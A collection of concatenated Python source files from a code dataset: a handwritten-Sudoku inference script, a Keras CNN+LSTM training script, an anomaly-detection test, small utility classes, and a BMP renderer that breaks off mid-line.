{1:22,7:78}]\r\nsemilexicalcell_pred = {}\r\n# Maintaining a set of conflict tuples encountered\r\nconflict_set = set()\r\ncnn_pred_board = []\r\ninput_board = []\r\nmodel_refined = 0\r\ntrain_encoding = 0\r\n\r\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\r\nX_train = X_train.astype('float32')\r\nX_train /= 255\r\nX_train = X_train.reshape(X_train.shape[0], 28, 28, 1)\r\n\r\ndef load_model():\r\n\t# load json and create model\r\n\tjson_file = open('model_digit.json', 'r')\r\n\tloaded_model_json = json_file.read()\r\n\tjson_file.close()\r\n\tloaded_model = model_from_json(loaded_model_json)\r\n\t# load weights into new model\r\n\tloaded_model.load_weights(\"model_digit.h5\")\r\n\tprint(\"Loaded model from disk\")\r\n\treturn loaded_model\r\n\r\n# Create a new model from the trained model\r\n# This produces the output of the pooling layer\r\n\r\ndef create_max_pool_model(layer,model):\r\n model_refined = Model(inputs=model.inputs, outputs=model.layers[layer].output)\r\n train_encoding = model_refined.predict(X_train)\r\n return model_refined, train_encoding\r\n\r\n\r\ndef inference(model, img):\r\n\tpr = model.predict_classes(img.reshape(1, 28, 28, 1).astype('float32') / 255)\r\n\treturn pr\r\n\r\n\r\n# Deduce all the conflicting pairs once a conflict is found\r\ndef check_valid_board(board):\r\n\t# Check row values for all conflicts first\r\n\trow_num = 0\r\n\tcolumn_num = 0\r\n\tconflict_id = 1\r\n\t# Check for all the conflicting pairs in a row and there related conflicts\r\n\tfor row in board:\r\n\t\ti = 0\r\n\t\tconflict_stack = []\r\n\t\twhile i < len(row):\r\n\t\t\tj = i + 1\r\n\t\t\twhile j < len(row):\r\n\t\t\t\t# if there is a conflict in the row and that connflict cell has not been encountered previously\r\n\t\t\t\tif board[row_num][i] == board[row_num][j] and (row_num, i) not in conflict_set:\r\n\t\t\t\t\t# Add the first conflicting pairs in a stack\r\n\t\t\t\t\tconflict_stack.append((row_num, i))\r\n\t\t\t\t\tconflict_stack.append((row_num, j))\r\n\t\t\t\t\t# Check for other conflicts of the conflicting pair\r\n\t\t\t\t\t# Adding the conflict id in the map\r\n\t\t\t\t\tif conflict_id not in conflict_pairs.keys():\r\n\t\t\t\t\t\tconflict_pairs[conflict_id] = set()\r\n\t\t\t\t\t# check for conflict until the conflict stack is empty\r\n\t\t\t\t\twhile len(conflict_stack) != 0:\r\n\t\t\t\t\t\tele = conflict_stack.pop()\r\n\t\t\t\t\t\tconflict_pairs.get(conflict_id).add(ele)\r\n\t\t\t\t\t\tconflict_set.add(ele)\r\n\t\t\t\t\t\tele_row = ele[0]\r\n\t\t\t\t\t\tele_col = ele[1]\r\n\t\t\t\t\t\tk = 0\r\n\t\t\t\t\t\t# Check for other conflict cells in row and column\r\n\t\t\t\t\t\twhile k < len(row):\r\n\t\t\t\t\t\t\tif (board[ele_row][k] == board[ele_row][ele_col]) and (\r\n\t\t\t\t\t\t\t\t\t(ele_row, k) not in conflict_set) and (\r\n\t\t\t\t\t\t\t\t\tele_row, k) not in conflict_stack:\r\n\t\t\t\t\t\t\t\tconflict_stack.append((ele_row, k))\r\n\t\t\t\t\t\t\tif (board[k][ele_col] == board[ele_row][ele_col]) and (\r\n\t\t\t\t\t\t\t\t\t(k, ele_col) not in conflict_set) and (\r\n\t\t\t\t\t\t\t\t\tk, ele_col) not in conflict_stack:\r\n\t\t\t\t\t\t\t\tconflict_stack.append((k, ele_col))\r\n\t\t\t\t\t\t\tk = k + 1\r\n\t\t\t\t\tconflict_id = conflict_id + 1\r\n\t\t\t\tj = j + 1\r\n\t\t\ti = i + 1\r\n\t\trow_num = row_num + 1\r\n\r\n\t# Check for column conflict this only applies if the ambiguities are swapped in a row\r\n\tboard_transpose = board.T\r\n\tfor column in board_transpose:\r\n\t\ti = 0\r\n\t\twhile i < len(column):\r\n\t\t\tj = i + 1\r\n\t\t\twhile j < len(column):\r\n\t\t\t\tif board_transpose[column_num][i] == board_transpose[column_num][j] and (\r\n\t\t\t\t\t\ti, column_num) not in conflict_set:\r\n\t\t\t\t\t# Check for other conflicts of the conflicting pair\r\n\t\t\t\t\t# Adding the conflict id in the map\r\n\t\t\t\t\tif conflict_id not in conflict_pairs.keys():\r\n\t\t\t\t\t\tconflict_pairs[conflict_id] = set()\r\n\t\t\t\t\tconflict_pairs.get(conflict_id).add((i, column_num))\r\n\t\t\t\t\tconflict_pairs.get(conflict_id).add((j, column_num))\r\n\t\t\t\t\tconflict_set.add((i, column_num))\r\n\t\t\t\t\tconflict_set.add((j, column_num))\r\n\t\t\t\t\tconflict_id = conflict_id + 1\r\n\t\t\t\tj = j + 1\r\n\t\t\ti = i + 1\r\n\t\tcolumn_num = column_num + 1\r\n\r\n\tif len(conflict_pairs) == 0:\r\n\t\treturn True\r\n\treturn False\r\n\r\n\r\n# Function to remove ambiguities\r\n# And return the correct solution board\r\ndef create_correct_solution(board):\r\n\tkey = []\r\n\tfor conflict_id in conflict_pairs.keys():\r\n\t\tif conflict_id in key:\r\n\t\t\tcontinue\r\n\t\t# Case 1: unique row conflict\r\n\t\tif len(conflict_pairs.get(conflict_id)) == 3:\r\n\t\t\tset_number = {1, 2, 3, 4, 5, 6, 7, 8, 9}\r\n\t\t\tconflict_list = list(conflict_pairs.get(conflict_id))\r\n\t\t\tconflict_list.sort(key = lambda x: x[0])\r\n\t\t\tprint(conflict_list)\r\n\t\t\tif conflict_list[0][0] != conflict_list[1][0] and conflict_list[0][1] != conflict_list[1][1]:\r\n\t\t\t\tconflict_ele = conflict_list[2]\r\n\t\t\telif conflict_list[0][0] != conflict_list[2][0] and conflict_list[0][1] != conflict_list[2][1]:\r\n\t\t\t\tconflict_ele = conflict_list[1]\r\n\t\t\telse:\r\n\t\t\t\tconflict_ele = conflict_list[0]\r\n\t\t\tcol_num = conflict_ele[1]\r\n\t\t\tfor i in range(9):\r\n\t\t\t\ttry:\r\n\t\t\t\t\tset_number.remove(board[i][col_num])\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint('The key' + str(board[i][col_num]) + ' has already been removed')\r\n\t\t\tboard[conflict_ele[0]][conflict_ele[1]] = list(set_number)[0]\r\n\t\t\tkey.append(conflict_id)\r\n\t\t# Case 2: Conflict in only column when row items are swapped\r\n\t\telif len(conflict_pairs.get(conflict_id)) == 2:\r\n\t\t\tconflict_list = list(conflict_pairs.get(conflict_id))\r\n\t\t\tcolumn_of_conflict = conflict_list[0][1]\r\n\t\t\tset_number = {1, 2, 3, 4, 5, 6, 7, 8, 9}\r\n\t\t\tfor i in range(9):\r\n\t\t\t\ttry:\r\n\t\t\t\t\tset_number.remove(board[i][column_of_conflict])\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass\r\n\t\t\tconflict_tuples = None\r\n\t\t\t# Check which the common row between two tuple conflicts and if the number required is in the conflicted tuple\r\n\t\t\tfor k , v in conflict_pairs.items():\r\n\t\t\t\tif list(v) != conflict_list and len(v) == 2:\r\n\t\t\t\t\tv = list(v)\r\n\t\t\t\t\tif conflict_list[0][0] == v[0][0]:\r\n\t\t\t\t\t\tconflict_tuples = (v[0],conflict_list[0])\r\n\t\t\t\t\telif conflict_list[1][0] == v[0][0]:\r\n\t\t\t\t\t\tconflict_tuples = (v[0],conflict_list[1])\r\n\t\t\t\t\telif conflict_list[0][0] == v[1][0]:\r\n\t\t\t\t\t\tconflict_tuples = (v[1],conflict_list[0])\r\n\t\t\t\t\telif conflict_list[1][0] == v[1][0]:\r\n\t\t\t\t\t\tconflict_tuples = (v[1],conflict_list[1])\r\n\t\t\t\t\t# If one common row conflict tuple was found\r\n\t\t\t\t\tif conflict_tuples != None:\r\n\t\t\t\t\t\t# The conflict tuple has the missing number then swap the two pairs\r\n\t\t\t\t\t\tif board[conflict_tuples[0][0]][conflict_tuples[0][1]] == list(set_number)[0]:\r\n\t\t\t\t\t\t\tkey.append(k)\r\n\t\t\t\t\t\t\tkey.append(conflict_id)\r\n\t\t\t\t\t\t\ttemp = board[conflict_tuples[0][0]][conflict_tuples[0][1]]\r\n\t\t\t\t\t\t\tboard[conflict_tuples[0][0]][conflict_tuples[0][1]] = board[conflict_tuples[1][0]][conflict_tuples[1][1]]\r\n\t\t\t\t\t\t\tboard[conflict_tuples[1][0]][conflict_tuples[1][1]] = temp\r\n\t\t\t\t\t\t\tbreak\r\n\r\n\t\t# Case 3 : When there is cyclic dependency and the board needs to be solved\r\n\t\telse:\r\n\t\t\tconflict_list = list(conflict_pairs.get(conflict_id))\r\n\t\t\tkey.append(conflict_id)\r\n\t\t\tfor conflict_item in conflict_list:\r\n\t\t\t\tboard[conflict_item[0]][conflict_item[1]] = 0\r\n\t\t\tprint(np.array(board))\r\n\t\r\n\t# Make the positions 0 for every conflict that could not be resolved\r\n\tfor conflict_id in conflict_pairs.keys():\r\n\t\tif conflict_id in key:\r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tconflict_list = conflict_pairs.get(conflict_id)\r\n\t\t\tfor ele in conflict_list:\r\n\t\t\t\tboard[ele[0]][ele[1]] = 0\r\n\tboard = sd.call_solve_sudoku(np.asarray(board))\r\n\tif not board:\r\n\t\tprint(\"This board cannot be solved\")\r\n\t\treturn False\r\n\treturn board\r\n\r\n\r\nif __name__ == '__main__':\r\n\t'''#Part to fill up the board on the basis of global consistency\r\n\tmodel = load_model()\r\n\tmodel_refined, train_encoding = create_max_pool_model(5,model)\r\n\tpath = './SudokoPerfectSolution/'\r\n\twith open(str(path + 'configuration_' + str(argumentList[1]) +'.csv'), newline='') as csvfile:\r\n\t\tconf_reader = csv.reader(csvfile, delimiter=',', quotechar='|')\r\n\t\trow_count = 0\r\n\t\tfor row in conf_reader:\r\n\t\t\tcol_count = 0\r\n\t\t\tinput_board.append(row)\r\n\t\t\tfor x in row:\r\n\t\t\t\tnew_path = ''\r\n\t\t\t\tnew_path = path + x + '.png'\r\n\t\t\t\ttest_image = ds.read_image(new_path)\r\n\t\t\t\t# Computing global consistency, if globally consistent fill the board position else, \r\n\t\t\t\t# Store confidence for cell in decreasing order\r\n\t\t\t\tsupport = ds.compute_support(test_image, 100,model_refined,train_encoding)\r\n\t\t\t\tpredicted = int(inference(model, cv2.imread(new_path,0)))\r\n\t\t\t\tif support.get(predicted) > 80:\r\n\t\t\t\t\tboard[row_count][col_count] = predicted\r\n\t\t\t\telse:\r\n\t\t\t\t\tboard[row_count][col_count] = 0\r\n\t\t\t\t\tsemilexicalcell_pred[(row_count,col_count)]=support\r\n\t\t\t\tcol_count = col_count + 1\r\n\t\t\trow_count = row_count + 1\r\n\tprint(semilexicalcell_pred)\r\n\tprint(board)\r\n\tcnn_pred_board = copy.deepcopy(board)'''\r\n\t#Just dummy testing for the backtracking algorithm\r\n\t#semilexicalcell_pred = {(0, 0): {9: 68, 4: 21, 5: 10, 8: 1}, (0, 1): {3: 64, 5: 30, 7: 3, 9: 2, 0: 1}, (0, 4): {6: 75, 5: 11, 9: 10, 4: 4}, (1, 2): {6: 75, 5: 11, 9: 10, 4: 4}, (1, 3): {3: 76, 5: 24}, (2, 5): {9: 68, 4: 21, 5: 10, 8: 1}, (2, 7): {3: 76, 5: 24}, (2, 8): {6: 75, 5: 11, 9: 10, 4: 4}, (3, 2): {3: 76, 5: 24}, (3, 3): {9: 68, 4: 21, 5: 10, 8: 1}, (3, 6): {6: 75, 5: 11, 9: 10, 4: 4}, (4, 3): {6: 75, 5: 11, 9: 10, 4: 4}, (4, 6): {3: 76, 5: 24}, (5, 0): {6: 75, 5: 11, 9: 10, 4: 4}, (5, 5): {3: 76, 5: 24}, (6, 0): {3: 76, 5: 24}, (6, 5): {6: 75, 5: 11, 9: 10, 4: 4}, (7, 7): {6: 75, 5: 11, 9: 10, 4: 4}, (7, 8): {3: 76, 5: 24}, (8, 1): {6: 75, 5: 11, 9: 10, 4: 4}, (8, 4): {3: 76, 5: 24}}\r\n\t#board = [[0,0,5,2,0,9,7,8,1],[1,2,0,0,7,8,4,5,9],[9,7,8,1,5,0,2,0,0],[2,1,0,0,8,5,0,9,7],[5,4,7,0,9,1,0,2,8],[0,8,9,7,2,0,1,4,5],[0,5,1,8,4,0,9,7,2],[7,9,4,5,1,2,8,0,0],[8,0,2,9,0,7,5,1,4]]\r\n\t# print(semilexicalcell_pred)\r\n\tsemilexicalcell_pred = {(0, 1): {9: 50, 4: 50}, (1, 1): {3: 50, 5: 50}, (1, 2): {9: 50, 4: 50}}\r\n\tboard = [[6, 0, 1, 8, 7, 4, 5, 3, 2], [2, 0, 0, 1, 3, 9, 6, 8, 7], [8, 3, 7, 6, 2, 5, 4, 1, 9], [1, 6, 3, 9, 5, 7, 2, 4, 8], [9, 8, 2, 4, 1, 6, 7, 5, 3], [4, 7, 5, 3, 8, 2, 1, 9, 6], [3, 2, 8, 7, 4, 1, 9, 6, 5], [5, 1, 9, 2, 6, 3, 8, 7, 4], [7, 4, 6, 5, 9, 8, 3, 2, 1]]\r\n\tprint('------------------Board before-------------------')\r\n\tprint(board)\r\n\tval = check_valid_board(np.asarray(board))\r\n\tif not val:\r\n\t\tboard = sd.call_solve_sudoku(np.asarray(board),semilexicalcell_pred)\r\n\tprint('------------------Board after-------------------')\r\n\tprint(board)\r\n\t'''if not val:\r\n\t\tnew_board = create_correct_solution(board)\r\n\t\tif new_board:\r\n\t\t\tfor row in new_board:\r\n\t\t\t\tprint(row)\r\n\r\n\t\tdict_correct_cell = {}\r\n\t\tdict_incorrect_cell = {}\r\n\t\tfor j in range(0,9):\r\n\t\t\tfor k in range(0,9):\r\n\t\t\t\tif cnn_pred_board[j][k] == new_board[j][k]:\r\n\t\t\t\t\tif cnn_pred_board[j][k] in dict_correct_cell.keys():\r\n\t\t\t\t\t\tdict_correct_cell[cnn_pred_board[j][k]].append((j,k))\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tdict_correct_cell[cnn_pred_board[j][k]] = [(j,k)]\r\n\t\t\t\telse:\r\n\t\t\t\t\tif new_board[j][k] in dict_incorrect_cell.keys():\r\n\t\t\t\t\t\tdict_incorrect_cell[new_board[j][k]].append((j,k))\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tdict_incorrect_cell[new_board[j][k]]= [(j,k)]\r\n\r\n\t\tfor k in dict_incorrect_cell.keys():\r\n\t\t\tfor cell in dict_incorrect_cell[k]:\r\n\t\t\t\ttest = ds.read_image('./SudokoPerfectSolution/'+input_board[cell[0]][cell[1]]+'.png')\r\n\t\t\t\tprint('Support For :'+input_board[cell[0]][cell[1]]+'.png')\r\n\t\t\t\tds.compute_support(test, 100)\r\n\t\t\t\t\r\n\t\t\t\t# print(\"input_board[cell[0]][cell[1]]\", input_board[cell[0]][cell[1]])\r\n\t\t\t\tdistance = []\r\n\t\t\t\tfor corr_cell in dict_correct_cell[k]:\r\n\t\t\t\t\t# print(\"input_board[corr_cell[0]][corr_cell[1]]\", input_board[corr_cell[0]][corr_cell[1]])\r\n\t\t\t\t\tdistance.append((k, ds.compute_distance(ds.read_image('./SudokoPerfectSolution/'+input_board[corr_cell[0]][corr_cell[1]]+'.png'),\r\n\t\t\t\t\tds.read_image('./SudokoPerfectSolution/'+input_board[cell[0]][cell[1]]+'.png'))))\r\n\t\t\t\tfor corr_cell in dict_correct_cell[cnn_pred_board[cell[0]][cell[1]]]:\r\n\t\t\t\t\tdistance.append((cnn_pred_board[cell[0]][cell[1]], ds.compute_distance(ds.read_image('./SudokoPerfectSolution/'+input_board[corr_cell[0]][corr_cell[1]]+'.png'), ds.read_image('./SudokoPerfectSolution/'+input_board[cell[0]][cell[1]]+'.png'))))\r\n\t\t\t\tdistance.sort(key = lambda x: x[1])\r\n\t\t\t\tprint(distance)'''","sub_path":"HandwrittenSodukuExperiments/Inference.py","file_name":"Inference.py","file_ext":"py","file_size_in_byte":12811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"139205756","text":"class ConsistencyResultData:\n \n def __init__(self):\n self.possibleOperations = ['INSERT', 'UPDATE', 'DELETE']\n self.operationDict = {};\n for operation in self.possibleOperations:\n self.operationDict[operation] = [];\n \n def add(self, operation, time, delay):\n if not operation in self.possibleOperations:\n raise Exception('Illegal operation: ' + str(operation));\n resultTuple = (time, delay);\n self.operationDict[operation].append(resultTuple);\n\n def getAvarageDelayForOperation(self, operation):\n if not operation in self.possibleOperations:\n raise Exception('Illegal operation: ' + str(operation));\n averageDelay = 0;\n operationCounter = 0;\n for (_, delay) in self.operationDict[operation]:\n averageDelay += delay;\n operationCounter += 1;\n if operationCounter == 0:\n return -1;\n return averageDelay/operationCounter;\n \n def printResults(self):\n for operation in self.operationDict:\n print(\"=== \" + operation + \" ===\");\n for (time, delay) in self.operationDict[operation]:\n print(str(time) + \",\" + str(delay));","sub_path":"front_end/plot/ConsistencyResultData.py","file_name":"ConsistencyResultData.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"360788016","text":"\"\"\"\n@Project :线程\n@Time :2018/8/28 12:55\n@Author :Zhenxian\n@File :定时器.py\n@Software :PyCharm\n\"\"\"\nfrom threading import Timer\n\n\ndef hello():\n print(\"Hello,world!\")\n\n\nt = Timer(5, hello)\nprint(\"5秒后输出:\")\nt.start()\n","sub_path":"线程/定时器.py","file_name":"定时器.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"214640735","text":"# export CUDA_VISIBLE_DEVICES=1,2\nimport os\nimport sys\nimport time\nimport os.path as osp\n\n# Add the parent module to the import path\nsys.path.append(osp.realpath(osp.join(osp.dirname(__file__), '../')))\n\nfrom keras.optimizers import adam\nfrom keras.initializers import glorot_uniform\nfrom keras.models import Sequential, Model, load_model\nfrom keras.callbacks import ModelCheckpoint, CSVLogger, TensorBoard, Callback\nfrom keras.layers import Dense, Activation, Flatten, Input, LSTM, TimeDistributed\n\nfrom collections import OrderedDict\nfrom SaveModelDirectory import create_path\n\nfrom _saving.SaveModelDirectory import create_path\nfrom _saving.ModelParameters import ModelParameters\n\nimport warnings\nwarnings.simplefilter(\"ignore\", DeprecationWarning)\n\n\n__author__ = 'Daniel Garcia Zapata'\n\n# Flow From Directory\ndef obtain_datagen(datagen, train_path, h5=True):\n\treturn datagen.flow_from_directory(\n\t\t\t\ttrain_path,\n\t\t\t\ttarget_size=(img_width,img_height),\n\t\t\t\tbatch_size=batch_size,\n\t\t\t\tclass_mode='binary',\n\t\t\t\tpartition=partition) \t\n\n# Yield for data generators\ndef generate_data_generator_for_two_images(genX1):\n\twhile True:\n\t\tX1i = genX1.next()\n\t\tyield X1i[0], X1i[1]\n\nif __name__ == '__main__':\n\n\t__model__ = 'CNN_LSTM_Image'\n\n\tprint('Starting:', time.ctime(), '\\n')\n\n\n\t###########################################\n\t# Parameters\n\t\n\tepochs = 20\n\tbatch_size = 30\n\timpl = 2 \t\t\t# gpu\t\n\n\t###########################################\n\t# Data\n\t\n\timg_width, img_height, channels = 224, 224, 3 \t\t# Resolution of inputs\n\tinput_shape = 4096\n\n\tdataset = 'OULU-CASIA'\n\tpartition = 'prealigned'\n\tif dataset == 'OULU-CASIA':\n\t\tfrom preprocessing.image_img import ImageDataGenerator\n\n\t\ttrain_data_dir = os.path.join('..', '..', '_Dataset', dataset, 'consecutive', 'training')\t\n\t\tvalidation_data_dir = os.path.join('..', '..', '_Dataset', dataset, 'consecutive', 'validation')\n\n\t\tframes = 5\n\t\tn_output = 6\n\n\t\tnb_train_samples = 6019 / batch_size\n\t\tnb_validation_samples = 1947 / batch_size\n\n\telse:\n\t\tfrom preprocessing.image_img import ImageDataGenerator\n\n\t\ttrain_data_dir = os.path.join('..', '..', '_Dataset', dataset, '5frames', 'training')\t\n\t\tvalidation_data_dir = os.path.join('..', '..', '_Dataset', dataset, '5frames', 'validation')\n\n\t\tframes = 5\n\t\tn_output = 12\n\n\t\tnb_train_samples = 27971 / batch_size\n\t\tnb_validation_samples = 4173 / batch_size\t\t\n\n\t############################################\n\t# Model\n\n\tneurons = 512\n\tnlayers = 2\n\tdropout = 0.5\n\n\tlr = 0.0001\t\t\n\n\tactivation = 'relu'\n\tactivation_r = 'sigmoid'\n\n\t# Initialize weights\n\tweight_init = glorot_uniform(seed=3)\t\n\n\t'''\n\tLoad the output of the CNN\n\t'''\n\tcnn_model = load_model(os.path.join('weights', 'CNN_prealigned_epoch-14_val-accu-0.2636.hdf5'))\n\n\tmodel_input = Input(shape=(frames, img_width, img_height, channels), \n\t\t\t\t\t\tname='seq_input')\n\n\tx = TimeDistributed(cnn_model)(model_input)\n\tx = TimeDistributed(Flatten())(x)\n\tx = LSTM(neurons, dropout=dropout, name='lstm')(x)\n\tout = Dense(n_output, kernel_initializer=weight_init, name='out')(x)\n\n\tmodel = Model(inputs=[model_input], outputs=out)\n\n\tmodel.summary()\n\n\t''' Freeze previous layers '''\n\tfor layer in cnn_model.layers:\n\t\tlayer.trainable = False\t\t\t\n\n\t###########################################\n\t# Data Generator\n\n\tdatagen = ImageDataGenerator(\n\t\trescale=1. / 224,\n\t\tshear_range=0.2,\n\t\tzoom_range=0.2,\n\t\thorizontal_flip=True)\n\n\t# Training data generators\n\ttrain_generator = obtain_datagen(datagen, train_data_dir)\n\tvalidation_generator = obtain_datagen(datagen, validation_data_dir)\n\n\t# Yield for data generators\n\tdataset_train_gen = generate_data_generator_for_two_images(train_generator)\n\tdataset_val_gen = generate_data_generator_for_two_images(validation_generator)\n\n\t############################################\n\t''' Training '''\n\n\toptimizer = adam(lr=lr)\n\tloss = 'sparse_categorical_crossentropy'\t\n\tmodel.compile(\tloss=loss,\n\t\t\t\t\toptimizer=optimizer,\t\t\n\t\t\t\t\tmetrics=['accuracy', 'top_k_categorical_accuracy'])\n\n\t'''\n\tCallbacks\n\t'''\n\trow_dict = OrderedDict({'model': __model__, \n\t\t\t\t\t\t\t'dataset': dataset,\n\t\t\t\t\t\t\t'partition': partition,\n\t\t\t\t\t\t\t'loss': loss,\n\t\t\t\t\t\t\t'lr': lr,\n\t\t\t\t\t\t\t'nlayers': nlayers,\n\t\t\t\t\t\t\t'date': time.ctime()})\n\n\t# Create Version folder\n\texport_path = create_path(__model__, dataset)\n\n\tcheckpointer = ModelCheckpoint(filepath=osp.join(export_path, __model__+'_epoch-{epoch:02d}_val-accu-{val_acc:.4f}.hdf5'), verbose=1) #, save_best_only=True) \n\tcsv_logger = CSVLogger(osp.join(export_path, '_logs_'+__model__+'.log'), separator=',', append=False)\n\ttensorboard = TensorBoard(log_dir=export_path, histogram_freq=0, batch_size=batch_size, write_graph=True, write_grads=False, write_images=False, embeddings_freq=0, embeddings_layer_names=None, embeddings_metadata=None)\n\tmodel_parameters = ModelParameters(osp.join(export_path, '_model_'+__model__+'.log'), row_dict)\n\n\tmodel.fit_generator(dataset_train_gen,\n\t\t\t\t\t\tsteps_per_epoch=nb_train_samples,\n\t\t\t\t\t\tepochs=epochs,\n\t\t\t\t\t\tvalidation_data=dataset_val_gen,\n\t\t\t\t\t\tvalidation_steps=nb_validation_samples,\n\t\t\t\t\t\tcallbacks=[checkpointer, csv_logger, tensorboard, model_parameters])\n\n\tprint('\\nEnding:', time.ctime())\n","sub_path":"Models/CNN+LSTM/LSTM_Image.py","file_name":"LSTM_Image.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"36507408","text":"from COL import COL\n\nclass COLS:\n \n def __init__(self, t):\n self.names = t\n self.all = []\n self.x = []\n self.y = []\n\n for n,s in enumerate(t):\n col = COL(n, s)\n self.all.append(col)\n if not col.isIgnored:\n if hasattr(col, 'isKlass') and col.isKlass:\n self.klass = col\n if(col.isGoal):\n self.y.append(col)\n else:\n self.x.append(col)\n ","sub_path":"src/hw5/COLS.py","file_name":"COLS.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"381928360","text":"from lib.H3iSVC import H3iSVC\nimport numpy as np\nimport utils.plot_utils as pltool\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\nfrom sklearn.metrics import accuracy_score as acc\nfrom sklearn.preprocessing import StandardScaler\n\nX = loadmat('../datasets/syndata.mat')['X']\ny = loadmat('../datasets/syndata.mat')['Y'].astype('int8').ravel()\nscaler = StandardScaler()\nX = scaler.fit_transform(X)\nminx, maxx = X.min(axis=0), X.max(axis=0)\ny[y != 1] = -1\nasize, nsize = y[y == 1].size, y[y == -1].size\nax = plt.subplot(2, 2, 1)\nclf = H3iSVC(C=0.1, gamma=2, similarity=0.8)\nclf.fit(X)\nax.plot(X[clf.y == -1, 0], X[clf.y == -1, 1], 'k.', ms=2)\nax.plot(X[clf.y == 1, 0], X[clf.y == 1, 1], 'ko', ms=4, mfc='none')\nerr = 1-acc(y, clf.y)\nXX, YY = pltool.getBoxbyX(X)\ndist = clf.decision_function(np.c_[XX.ravel().reshape(XX.size, 1),\n YY.ravel().reshape(YY.size, 1)])\nax.contour(XX, YY, dist.reshape(XX.shape), levels=[clf.r], colors='k', linewidths=[2])\nax.contourf(XX, YY, dist.reshape(XX.shape), 3, cmap=plt.get_cmap('bone'), alpha=0.2)\nax.set(title='{:.2f}'.format(err))\naid = 2\nfor i in np.array([1, 5, 10]):\n ytr = np.zeros_like(y)\n anomaly_idx = np.random.choice(np.where(y == 1)[0], i)\n nomaly_idx = np.random.choice(np.where(y == -1)[0], i)\n ytr[anomaly_idx] = 1\n ytr[nomaly_idx] = -1\n clf.fit(X, ytr)\n err = 1-acc(y, clf.y)\n dist = clf.decision_function(np.c_[XX.ravel().reshape(XX.size, 1),\n YY.ravel().reshape(YY.size, 1)])\n ax = plt.subplot(2, 2, aid)\n ax.plot(X[clf.y == -1, 0], X[clf.y == -1, 1], 'k.', ms=2)\n ax.plot(X[clf.y == 1, 0], X[clf.y == 1, 1], 'ko', ms=4, mfc='none')\n ax.plot(X[anomaly_idx, 0], X[anomaly_idx, 1], 'o', ms=8, mfc='none', mec='r')\n ax.plot(X[nomaly_idx, 0], X[nomaly_idx, 1], 'o', ms=8, mfc='none', mec='b')\n ax.contour(XX, YY, dist.reshape(XX.shape), levels=[clf.r], colors='k', linewidths=[2])\n ax.contourf(XX, YY, dist.reshape(XX.shape), 3, cmap=plt.get_cmap('bone'), alpha=0.2)\n ax.set(title='Error: {:.2f}'.format(err))\n aid += 1\nplt.show()\n","sub_path":"test/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"109063423","text":"import struct\nfrom obj import Obj\nimport math\n\n\n# ===============================================================\n# Utilities\n# ===============================================================\n\ndef char(c):\n \"\"\"\n Input: requires a size 1 string\n Output: 1 byte of the ascii encoded char\n \"\"\"\n return struct.pack('=c', c.encode('ascii'))\n\n\ndef word(w):\n \"\"\"\n Input: requires a number such that (-0x7fff - 1) <= number <= 0x7fff\n ie. (-32768, 32767)\n Output: 2 bytes\n Example:\n >>> struct.pack('=h', 1)\n b'\\x01\\x00'\n \"\"\"\n return struct.pack('=h', w)\n\n\ndef dword(d):\n \"\"\"\n Input: requires a number such that -2147483648 <= number <= 2147483647\n Output: 4 bytes\n Example:\n >>> struct.pack('=l', 1)\n b'\\x01\\x00\\x00\\x00'\n \"\"\"\n return struct.pack('=l', d)\n\n\"Function that parses a color\"\ndef color(r, g, b):\n return bytes([b, g, r])\n\n\n# ===============================================================\n# Constants\n# ===============================================================\n\nBLACK = color(0, 0, 0)\nGREEN = color(50, 168, 82)\nBLUE = color(50, 83, 168)\nRED = color(168, 50, 60)\nWHITE = color(255, 255, 255)\n\n\n\nclass ViewPort(object):\n\n def setSize(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n\nclass Point(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n\n\n# ===============================================================\n# Renders a BMP file\n# ===============================================================\n\n\n\nclass Render(object):\n def __init__(self):\n self.paintColor = WHITE\n self.bufferColor = BLACK\n\n\n def glInit(self):\n self.viewPort = ViewPort()\n\n def glCreateWindow(self, width, height):\n self.width = width\n self.height = height\n self.glClear()\n\n\n def glViewPort(self, x, y, width, height):\n self.viewPort.setSize(x, y, width, height)\n\n def glClear(self):\n self.framebuffer = [\n [self.bufferColor for x in range(self.width)]\n for y in range(self.height)\n ]\n\n def glFinish(self, filename='out.bmp'):\n f = open(filename, 'bw')\n\n # File header (14 bytes)\n f.write(char('B'))\n f.write(char('M'))\n f.write(dword(14 + 40 + self.width * self.height * 3))\n f.write(dword(0))\n f.write(dword(14 + 40))\n\n # Image header (40 bytes)\n f.write(dword(40))\n f.write(dword(self.width))\n f.write(dword(self.height))\n f.write(word(1))\n f.write(word(24))\n f.write(dword(0))\n f.write(dword(self.width * self.height * 3))\n f.write(dword(0))\n f.write(dword(0))\n f.write(dword(0))\n f.write(dword(0))\n\n # Pixel data (width x height x 3 pixels)\n for x in range(self.height):\n for y in range(self.width):\n f.write(self.framebuffer[x][y])\n\n f.close()\n\n \n\n\n # Gl vertex solo normaliza las coordenadas de un solo punto\n def glVertex(self, x, y):\n currentYCordinate = self.viewPort.y + (self.viewPort.height//2) * (y + 1)\n currentXCordinate = self.viewPort.x + (self.viewPort.width//2) * (x + 1)\n self.point(currentXCordinate, currentYCordinate)\n\n def point(self, normalizedX, normalizedY):\n self.framebuffer[int(normalizedY)][int(normalizedX)] = self.paintColor\n\n def glClearColor(self, r, g, b):\n self.bufferColor = color(r,g,b)\n\n def glColor(self, r, g, b):\n self.paintColor= 